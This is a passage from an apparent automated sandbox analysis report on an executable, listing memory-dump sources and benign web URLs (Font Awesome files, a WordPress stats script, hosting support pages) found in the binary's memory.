PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://static.minne.com/files/banner/minne_600x500
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stats.wp.com/w.js?ver=202330
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.588156336.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586890411.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586479452.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.587455999.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.lolipop.jp/hc/ja/articles/360049132953
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tickets.suresupport.com/faq/article-1596/en
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/css/all.css
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/css/v4-shims.css
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.eot
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.eot?#iefix
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.svg#fontawesome
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.ttf
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.woff
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.woff2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.eot
